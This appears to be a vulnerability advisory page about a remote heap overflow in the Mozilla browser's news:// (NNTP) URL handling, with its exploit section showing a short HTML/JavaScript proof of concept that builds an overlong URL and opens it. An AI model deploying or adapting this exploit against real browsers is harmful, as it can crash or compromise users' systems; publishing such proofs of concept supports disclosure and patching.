• info
• discussion
• exploit
• solution
• references

Mozilla Browser Network News Transport Protocol Remote Heap Overflow Vulnerability

The following proof-of-concept script has been made available:

<html>
<script>
i = "news://news.individual.net/AAAAAAAAAAAAAA?";
for(l = 0; l < 16376; l++)
i=i+"A";
i=i+"/?profile/";
for(l = 0; l < 16384; l++)
i=i+"A";
i=i+"\\";
window.open(i);
</script>
</html>